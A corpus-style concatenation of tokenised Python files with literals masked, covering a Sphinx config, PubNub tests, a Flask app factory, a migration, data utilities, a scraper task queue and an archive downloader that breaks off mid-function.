<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT>' ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> import time <EOL> from pubnub import PubnubTwisted as Pubnub <EOL> pubkey = "<STR_LIT>" <EOL> subkey = "<STR_LIT>" <EOL> pubnub = Pubnub ( pubkey , subkey ) <EOL> pubnub_enc = Pubnub ( pubkey , subkey , cipher_key = "<STR_LIT>" ) <EOL> def test_1 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = "<STR_LIT>" <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_2 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> print ( resp ) <EOL> assert False <EOL> pubnub . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_3 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = { "<STR_LIT:a>" : "<STR_LIT:b>" } <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_4 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = <NUM_LIT:100> <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_5 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = "<STR_LIT:100>" <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_6 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = "<STR_LIT>" <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_7 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_8 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = { "<STR_LIT:a>" : "<STR_LIT:b>" } <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_9 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = <NUM_LIT:100> <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_10 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = "<STR_LIT:100>" <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_11 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = '<STR_LIT>' <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> def test_12 ( ) : <EOL> channel = "<STR_LIT>" + str ( time . time ( ) ) <EOL> message = '<STR_LIT>' <EOL> def _cb ( resp , ch = None ) : <EOL> assert resp == message <EOL> pubnub_enc . unsubscribe ( channel ) <EOL> def _connect ( resp ) : <EOL> def _cb1 ( resp , ch = None ) : <EOL> assert resp [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> def _err1 ( resp ) : <EOL> assert False <EOL> pubnub_enc . publish ( channel , message , callback = _cb1 , error = _err1 ) <EOL> def _error ( resp ) : <EOL> assert False <EOL> pubnub_enc . subscribe ( channel , callback = _cb , connect = _connect , error = _error ) <EOL> x = <NUM_LIT:5> <EOL> def run_test ( t ) : <EOL> global x <EOL> x += <NUM_LIT:5> <EOL> i = ( x / <NUM_LIT:5> ) - <NUM_LIT:1> <EOL> def _print ( ) : <EOL> print ( '<STR_LIT>' + str ( i ) ) <EOL> pubnub . timeout ( x , _print ) <EOL> pubnub . timeout ( x + <NUM_LIT:1> , t ) <EOL> def stop ( ) : <EOL> pubnub . stop ( ) <EOL> run_test ( test_1 ) <EOL> run_test ( test_2 ) <EOL> run_test ( test_3 ) <EOL> run_test ( test_4 ) <EOL> run_test ( test_5 ) <EOL> run_test ( test_6 ) <EOL> run_test ( test_7 ) <EOL> run_test ( test_8 ) <EOL> run_test ( test_9 ) <EOL> run_test ( test_10 ) <EOL> run_test ( test_11 ) <EOL> run_test ( stop ) <EOL> pubnub_enc . start ( ) </s>
<s> import sys <EOL> from pubnub import Pubnub <EOL> pubnub = Pubnub ( publish_key = '<STR_LIT>' , subscribe_key = '<STR_LIT>' ) <EOL> channel = '<STR_LIT>' <EOL> username = '<STR_LIT>' <EOL> message = '<STR_LIT>' <EOL> data = { <EOL> '<STR_LIT:username>' : username , <EOL> '<STR_LIT:message>' : message <EOL> } <EOL> def callback ( m ) : <EOL> print ( m ) <EOL> pubnub . publish ( channel , data , callback = callback , error = callback ) </s>
<s> import logging <EOL> from logging . handlers import SMTPHandler <EOL> from flask import Flask , current_app <EOL> from flask import url_for as flask_url_for <EOL> from flask_admin import Admin <EOL> from flask . ext . sqlalchemy import SQLAlchemy <EOL> from flask . ext . assets import Environment <EOL> from flask . ext . migrate import Migrate <EOL> from flask_oauthlib . client import OAuth <EOL> from flask_mail import Mail <EOL> from kombu import Exchange , Queue <EOL> from celery import Celery <EOL> from elasticsearch import Elasticsearch <EOL> from aleph import default_settings , archive <EOL> db = SQLAlchemy ( ) <EOL> migrate = Migrate ( ) <EOL> mail = Mail ( ) <EOL> celery = Celery ( '<STR_LIT>' ) <EOL> assets = Environment ( ) <EOL> oauth = OAuth ( ) <EOL> oauth_provider = oauth . remote_app ( '<STR_LIT>' , app_key = '<STR_LIT>' ) <EOL> admin = Admin ( template_mode = '<STR_LIT>' ) <EOL> def create_app ( config = { } ) : <EOL> app = Flask ( '<STR_LIT>' ) <EOL> app . config . from_object ( default_settings ) <EOL> if config . get ( '<STR_LIT>' ) : <EOL> app . config . from_envvar ( '<STR_LIT>' , silent = True ) <EOL> else : <EOL> app . config . from_envvar ( '<STR_LIT>' , silent = True ) <EOL> app . config . update ( config ) <EOL> app_name = app . config . get ( '<STR_LIT>' ) <EOL> if not app . debug and app . config . get ( '<STR_LIT>' ) : <EOL> credentials = ( app . config . get ( '<STR_LIT>' ) , <EOL> app . config . get ( '<STR_LIT>' ) ) <EOL> mail_handler = SMTPHandler ( app . config . get ( '<STR_LIT>' ) , <EOL> app . config . get ( '<STR_LIT>' ) , <EOL> app . config . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % app_name , <EOL> credentials = credentials , <EOL> secure = ( ) ) <EOL> mail_handler . setLevel ( logging . ERROR ) <EOL> app . logger . addHandler ( mail_handler ) <EOL> if '<STR_LIT>' not in app . config . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> queue_name = app_name + '<STR_LIT>' <EOL> app . config [ '<STR_LIT>' ] = queue_name <EOL> app . config [ '<STR_LIT>' ] = ( <EOL> Queue ( queue_name , Exchange ( queue_name ) , routing_key = queue_name ) , <EOL> ) <EOL> celery . conf . update ( app . config ) <EOL> celery . conf . update ( { <EOL> '<STR_LIT>' : app . config [ '<STR_LIT>' ] <EOL> } ) <EOL> migrate . init_app ( app , db , directory = app . config . get ( '<STR_LIT>' ) ) <EOL> oauth . init_app ( app ) <EOL> mail . init_app ( app ) <EOL> db . init_app ( app ) <EOL> assets . init_app ( app ) <EOL> admin . init_app ( app ) <EOL> return app <EOL> @ migrate . configure <EOL> def configure_alembic ( config ) : <EOL> app = current_app . _get_current_object ( ) <EOL> config . set_main_option ( '<STR_LIT>' , <EOL> app . config [ '<STR_LIT>' ] ) <EOL> return config <EOL> def get_config ( name , default = None ) : <EOL> return current_app . config . get ( name , default ) <EOL> def get_es ( ) : <EOL> app = current_app . _get_current_object ( ) <EOL> if not hasattr ( app , '<STR_LIT>' ) : <EOL> app . _es_instance = Elasticsearch ( app . config . get ( '<STR_LIT>' ) , <EOL> timeout = <NUM_LIT> ) <EOL> return app . _es_instance <EOL> def get_es_index ( ) : <EOL> app = current_app . _get_current_object ( ) <EOL> return app . config . get ( '<STR_LIT>' , app . config . get ( '<STR_LIT>' ) ) <EOL> def get_archive ( ) : <EOL> app = current_app . _get_current_object ( ) <EOL> if not hasattr ( app , '<STR_LIT>' ) : <EOL> app . _aleph_archive = archive . from_config ( app . config ) <EOL> return app . _aleph_archive <EOL> def url_for ( * a , ** kw ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> kw [ '<STR_LIT>' ] = True <EOL> if get_config ( '<STR_LIT>' ) : <EOL> kw [ '<STR_LIT>' ] = get_config ( '<STR_LIT>' ) <EOL> return flask_url_for ( * a , ** kw ) <EOL> except RuntimeError : <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . add_column ( '<STR_LIT>' , sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = True ) ) <EOL> op . add_column ( '<STR_LIT>' , sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = True ) ) <EOL> op . add_column ( '<STR_LIT>' , sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = True ) ) <EOL> op . add_column ( '<STR_LIT>' , sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = True ) ) <EOL> def downgrade ( ) : <EOL> op . drop_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> op . drop_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> op . drop_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> op . drop_column ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from normality import slugify <EOL> class TabularColumn ( object ) : <EOL> def __init__ ( self , schema , data ) : <EOL> self . schema = schema <EOL> self . data = data <EOL> self . label = data . get ( '<STR_LIT:label>' ) <EOL> self . name = data . get ( '<STR_LIT:name>' ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . label , self . name ) <EOL> class Tabular ( object ) : <EOL> def __init__ ( self , schema = None ) : <EOL> self . schema = schema or { } <EOL> if '<STR_LIT>' not in self . schema : <EOL> self . schema [ '<STR_LIT>' ] = [ ] <EOL> def add_column ( self , label ) : <EOL> label = unicode ( label ) <EOL> column = slugify ( label or '<STR_LIT>' , sep = '<STR_LIT:_>' ) <EOL> column = column or '<STR_LIT>' <EOL> column = column [ : <NUM_LIT> ] <EOL> name , i = column , <NUM_LIT:2> <EOL> while name in [ c . name for c in self . columns ] : <EOL> name = '<STR_LIT>' % ( name , i ) <EOL> i += <NUM_LIT:1> <EOL> column = { '<STR_LIT:label>' : label , '<STR_LIT:name>' : column } <EOL> self . schema [ '<STR_LIT>' ] . append ( column ) <EOL> return TabularColumn ( self , column ) <EOL> @ property <EOL> def sheet ( self ) : <EOL> return self . schema . get ( '<STR_LIT>' ) <EOL> @ property <EOL> def sheet_name ( self ) : <EOL> name = self . schema . get ( '<STR_LIT>' ) <EOL> if name is not None : <EOL> return name <EOL> return '<STR_LIT>' % self . sheet <EOL> @ property <EOL> def columns ( self ) : <EOL> for col in self . schema [ '<STR_LIT>' ] : <EOL> yield TabularColumn ( self , col ) <EOL> def to_dict ( self ) : <EOL> data = self . schema <EOL> data [ '<STR_LIT>' ] = self . sheet <EOL> data [ '<STR_LIT>' ] = self . sheet_name <EOL> return data <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % list ( self . columns ) </s>
<s> import os <EOL> import re <EOL> import gc <EOL> import six <EOL> import logging <EOL> import unicodedata <EOL> from hashlib import sha1 <EOL> from datetime import datetime , date <EOL> from unidecode import unidecode <EOL> from normality import slugify <EOL> log = logging . getLogger ( __name__ ) <EOL> COLLAPSE = re . compile ( r'<STR_LIT>' ) <EOL> WS = '<STR_LIT:U+0020>' <EOL> CATEGORIES = { <EOL> '<STR_LIT:C>' : '<STR_LIT>' , <EOL> '<STR_LIT:M>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : WS , <EOL> '<STR_LIT:P>' : '<STR_LIT>' , <EOL> '<STR_LIT:S>' : WS <EOL> } <EOL> def checksum ( filename ) : <EOL> """<STR_LIT>""" <EOL> hash = sha1 ( ) <EOL> with open ( filename , '<STR_LIT:rb>' ) as fh : <EOL> while True : <EOL> block = fh . read ( <NUM_LIT:2> ** <NUM_LIT:10> ) <EOL> if not block : <EOL> break <EOL> hash . update ( block ) <EOL> return hash . hexdigest ( ) <EOL> def make_filename ( source , sep = '<STR_LIT:->' ) : <EOL> if source is not None : <EOL> source = os . path . basename ( source ) <EOL> slugs = [ slugify ( s , sep = sep ) for s in source . split ( '<STR_LIT:.>' ) ] <EOL> source = '<STR_LIT:.>' . join ( slugs ) <EOL> source = source . strip ( '<STR_LIT:.>' ) . strip ( sep ) <EOL> return source <EOL> def latinize_text ( text ) : <EOL> if not isinstance ( text , six . text_type ) : <EOL> return text <EOL> text = unicode ( unidecode ( text ) ) <EOL> text = text . replace ( '<STR_LIT:@>' , '<STR_LIT:a>' ) <EOL> return text . lower ( ) <EOL> def normalize_strong ( text ) : <EOL> if not isinstance ( text , six . string_types ) : <EOL> return <EOL> if six . PY2 and not isinstance ( text , six . text_type ) : <EOL> text = text . decode ( '<STR_LIT:utf-8>' ) <EOL> text = latinize_text ( text . lower ( ) ) <EOL> text = unicodedata . normalize ( '<STR_LIT>' , text ) <EOL> characters = [ ] <EOL> for character in text : <EOL> category = unicodedata . category ( character ) [ <NUM_LIT:0> ] <EOL> character = CATEGORIES . get ( category , character ) <EOL> characters . append ( character ) <EOL> text = u'<STR_LIT>' . join ( characters ) <EOL> return COLLAPSE . sub ( WS , text ) . strip ( WS ) <EOL> def string_value ( value , encoding = None ) : <EOL> if encoding is None : <EOL> encoding = '<STR_LIT:utf-8>' <EOL> try : <EOL> if value is None : <EOL> return <EOL> if isinstance ( value , ( date , datetime ) ) : <EOL> return value . isoformat ( ) <EOL> elif isinstance ( value , float ) and not value . is_integer ( ) : <EOL> return unicode ( value ) <EOL> elif isinstance ( value , six . string_types ) : <EOL> if not isinstance ( value , six . text_type ) : <EOL> value = value . decode ( encoding ) <EOL> if not len ( value . strip ( ) ) : <EOL> return <EOL> else : <EOL> value = unicode ( value ) <EOL> return value <EOL> except Exception as ex : <EOL> log . exception ( ex ) <EOL> return <EOL> def find_subclasses ( cls ) : <EOL> all_refs = gc . get_referrers ( cls ) <EOL> results = [ ] <EOL> for o in all_refs : <EOL> if ( isinstance ( o , tuple ) and getattr ( o [ <NUM_LIT:0> ] , "<STR_LIT>" , None ) is o ) : <EOL> results . append ( o [ <NUM_LIT:0> ] ) <EOL> return results </s>
<s> from archivekit . resource import Resource <EOL> class Source ( Resource ) : <EOL> """<STR_LIT>""" <EOL> GROUP = '<STR_LIT:source>' <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . name </s>
<s> from datetime import datetime <EOL> try : <EOL> from urlparse import urlparse <EOL> except ImportError : <EOL> from urllib . parse import urlparse <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from ordereddict import OrderedDict <EOL> from sqlalchemy import Integer , UnicodeText , Float , DateTime , Boolean <EOL> from six import string_types <EOL> row_type = OrderedDict <EOL> def guess_type ( sample ) : <EOL> if isinstance ( sample , bool ) : <EOL> return Boolean <EOL> elif isinstance ( sample , int ) : <EOL> return Integer <EOL> elif isinstance ( sample , float ) : <EOL> return Float <EOL> elif isinstance ( sample , datetime ) : <EOL> return DateTime <EOL> return UnicodeText <EOL> def convert_row ( row_type , row ) : <EOL> if row is None : <EOL> return None <EOL> return row_type ( row . items ( ) ) <EOL> def normalize_column_name ( name ) : <EOL> if not isinstance ( name , string_types ) : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> name = name . lower ( ) . strip ( ) <EOL> if not len ( name ) or '<STR_LIT:.>' in name or '<STR_LIT:->' in name : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> return name <EOL> class ResultIter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , result_proxy , row_type = row_type , step = None ) : <EOL> self . result_proxy = result_proxy <EOL> self . row_type = row_type <EOL> self . step = step <EOL> self . keys = list ( result_proxy . keys ( ) ) <EOL> self . _iter = None <EOL> def _next_chunk ( self ) : <EOL> if self . result_proxy . closed : <EOL> return False <EOL> if not self . step : <EOL> chunk = self . result_proxy . fetchall ( ) <EOL> else : <EOL> chunk = self . result_proxy . fetchmany ( self . step ) <EOL> if chunk : <EOL> self . _iter = iter ( chunk ) <EOL> return True <EOL> else : <EOL> return False <EOL> def __next__ ( self ) : <EOL> if self . _iter is None : <EOL> if not self . _next_chunk ( ) : <EOL> raise StopIteration <EOL> try : <EOL> return convert_row ( self . row_type , next ( self . _iter ) ) <EOL> except StopIteration : <EOL> self . _iter = None <EOL> return self . __next__ ( ) <EOL> next = __next__ <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def safe_url ( url ) : <EOL> """<STR_LIT>""" <EOL> parsed = urlparse ( url ) <EOL> if parsed . password is not None : <EOL> pwd = '<STR_LIT>' % parsed . password <EOL> url = url . replace ( pwd , '<STR_LIT>' ) <EOL> return url </s>
<s> import json <EOL> import logging <EOL> from datetime import datetime <EOL> from pepparser . util import make_id <EOL> from pepparser . country import normalize_country <EOL> log = logging . getLogger ( __name__ ) <EOL> PUBLISHER = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:source>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def parse_ts ( ts ) : <EOL> return datetime . fromtimestamp ( int ( ts ) ) . date ( ) . isoformat ( ) <EOL> def everypolitician_parse ( emit , json_file ) : <EOL> with open ( json_file , '<STR_LIT:r>' ) as fh : <EOL> data = json . load ( fh ) <EOL> for policitian in data . get ( '<STR_LIT>' ) : <EOL> country = normalize_country ( policitian . get ( '<STR_LIT>' ) ) <EOL> entity = { <EOL> '<STR_LIT>' : make_id ( '<STR_LIT>' , policitian . get ( '<STR_LIT:id>' ) . split ( '<STR_LIT:->' ) [ - <NUM_LIT:1> ] ) , <EOL> '<STR_LIT:name>' : policitian . get ( '<STR_LIT:name>' ) , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : country } ] , <EOL> '<STR_LIT>' : parse_ts ( policitian . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : policitian . get ( '<STR_LIT>' ) <EOL> } <EOL> entity . update ( PUBLISHER ) <EOL> emit . entity ( entity ) </s>
<s> """<STR_LIT>""" <EOL> from uuid import uuid4 <EOL> from time import sleep <EOL> try : <EOL> from queue import Queue <EOL> except ImportError : <EOL> from Queue import Queue <EOL> from threading import Thread <EOL> class TaskManager ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , threads = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> self . num_threads = int ( threads ) <EOL> self . queue = None <EOL> def _spawn ( self ) : <EOL> """<STR_LIT>""" <EOL> self . queue = Queue ( maxsize = self . num_threads * <NUM_LIT:10> ) <EOL> for i in range ( self . num_threads ) : <EOL> t = Thread ( target = self . _consume ) <EOL> t . daemon = True <EOL> t . start ( ) <EOL> def _consume ( self ) : <EOL> """<STR_LIT>""" <EOL> while True : <EOL> try : <EOL> task , args , kwargs = self . queue . get ( True ) <EOL> task ( * args , ** kwargs ) <EOL> finally : <EOL> self . queue . task_done ( ) <EOL> def put ( self , task , args , kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . num_threads == <NUM_LIT:0> : <EOL> return task ( * args , ** kwargs ) <EOL> if self . queue is None : <EOL> self . _spawn ( ) <EOL> self . queue . put ( ( task , args , kwargs ) ) <EOL> def wait ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . queue is None : <EOL> return <EOL> self . queue . join ( ) <EOL> class ChainListener ( object ) : <EOL> def __init__ ( self , task ) : <EOL> self . task = task <EOL> def notify ( self , value ) : <EOL> self . task . queue ( value ) <EOL> class PipeListener ( ChainListener ) : <EOL> def notify ( self , value ) : <EOL> for value_item in value : <EOL> self . task . queue ( value_item ) <EOL> class Task ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , scraper , fn , task_id = None ) : <EOL> self . scraper = scraper <EOL> self . fn = fn <EOL> self . task_id = task_id <EOL> self . _listeners = [ ] <EOL> self . _source = None <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . scraper . task_ctx . name = getattr ( self . fn , '<STR_LIT>' , self . fn . __name__ ) <EOL> self . scraper . task_ctx . id = self . task_id or uuid4 ( ) <EOL> try : <EOL> self . scraper . log . debug ( '<STR_LIT>' , extra = { <EOL> '<STR_LIT>' : args , <EOL> '<STR_LIT>' : kwargs <EOL> } ) <EOL> value = self . fn ( * args , ** kwargs ) <EOL> for listener in self . _listeners : <EOL> listener . notify ( value ) <EOL> return value <EOL> except Exception as e : <EOL> self . scraper . log . exception ( e ) <EOL> finally : <EOL> self . scraper . task_ctx . name = None <EOL> self . scraper . task_ctx . id = None <EOL> def queue ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . scraper . task_manager . put ( self , args , kwargs ) <EOL> return self <EOL> def wait ( self ) : <EOL> """<STR_LIT>""" <EOL> self . scraper . task_manager . wait ( ) <EOL> return self <EOL> def run ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . _source is not None : <EOL> return self . _source . run ( * args , ** kwargs ) <EOL> else : <EOL> self . queue ( * args , ** kwargs ) <EOL> return self . wait ( ) <EOL> def chain ( self , other_task ) : <EOL> """<STR_LIT>""" <EOL> other_task . _source = self <EOL> self . _listeners . append ( ChainListener ( other_task ) ) <EOL> return other_task <EOL> def pipe ( self , other_task ) : <EOL> """<STR_LIT>""" <EOL> other_task . _source = self <EOL> self . _listeners . append ( PipeListener ( other_task ) ) <EOL> return other_task <EOL> def __gt__ ( self , other_task ) : <EOL> return self . chain ( other_task ) <EOL> def __or__ ( self , other_task ) : <EOL> return self . pipe ( other_task ) </s>
<s> from __future__ import absolute_import , print_function <EOL> import os <EOL> import shutil <EOL> import sys <EOL> import tempfile <EOL> import tarfile <EOL> if sys . version_info . major > <NUM_LIT:2> : <EOL> from urllib . request import urlretrieve <EOL> else : <EOL> from urllib import urlretrieve <EOL> ARCHIVE_URL = '<STR_LIT>' <EOL> def copy_indexes ( archive ) : <EOL> extract_dir = os . path . dirname ( archive ) <EOL> src_dir = os . path . join ( extract_dir , '<STR_LIT>' ) <EOL> dst_dir = os . path . expanduser ( '<STR_LIT>' ) <EOL> with tarfile . open ( archive , '<STR_LIT>' ) as tf : <EOL> tf . extractall ( extract_dir ) <EOL> if not os . path . exists ( dst_dir ) : <EOL> os . makedirs ( dst_dir ) <EOL> for name in os . listdir ( src_dir ) : <EOL> if name . endswith ( '<STR_LIT>' ) : <EOL> src = os . path . join ( src_dir , name ) <EOL> dst = os . path . join ( dst_dir , name ) <EOL> copy = True <EOL> if os . path . exists ( dst ) : <EOL> copy = _prompt_overwrite ( dst ) <EOL> if copy : <EOL> shutil . copy ( src , dst ) <EOL> def download_cinspect_data_archive ( url = None ) : <EOL> if url is None : <EOL> url = ARCHIVE_URL <EOL> t = tempfile . mkdtemp ( ) <EOL> print ( '<STR_LIT>' , t ) <EOL> filename = os . path . join ( t , '<STR_LIT>' ) <EOL> reporthook = lambda x , y , z : _spin ( <NUM_LIT:5> ) <EOL> urlretrieve ( url , filename , reporthook ) <EOL> print ( '<STR_LIT>' , filename ) <EOL> return filename <EOL> def _prompt_overwrite ( path ) : <EOL> if sys . version_info . major > 